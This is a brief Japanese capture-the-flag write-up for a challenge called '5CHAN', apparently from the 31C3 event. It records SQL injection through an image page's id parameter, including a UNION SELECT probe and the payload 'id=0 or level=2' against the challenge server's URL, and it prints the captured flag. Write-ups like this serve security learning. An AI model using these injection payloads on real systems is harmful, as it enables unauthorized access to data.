= 5CHAN =
 * 画像ページのid=のところでインジェクション可能
 * 'が入っているとエラーになる？エスケープされてるのか削除されているのかは不明。
 * `0 union select 1,1,1,1,1`するとエラーは発生しない。なにも表示されないけど。

色々データベース構造を調べたところpicturesにlevelという欄があったので，levelが大きい画像を取得したところフラグが表示された。
 * http://188.40.18.89/?page=pic&id=0+or+level=2
{{{
31c3_st0Pp_Us1nG_==_&&_St4rt_Us1Ng_===
}}}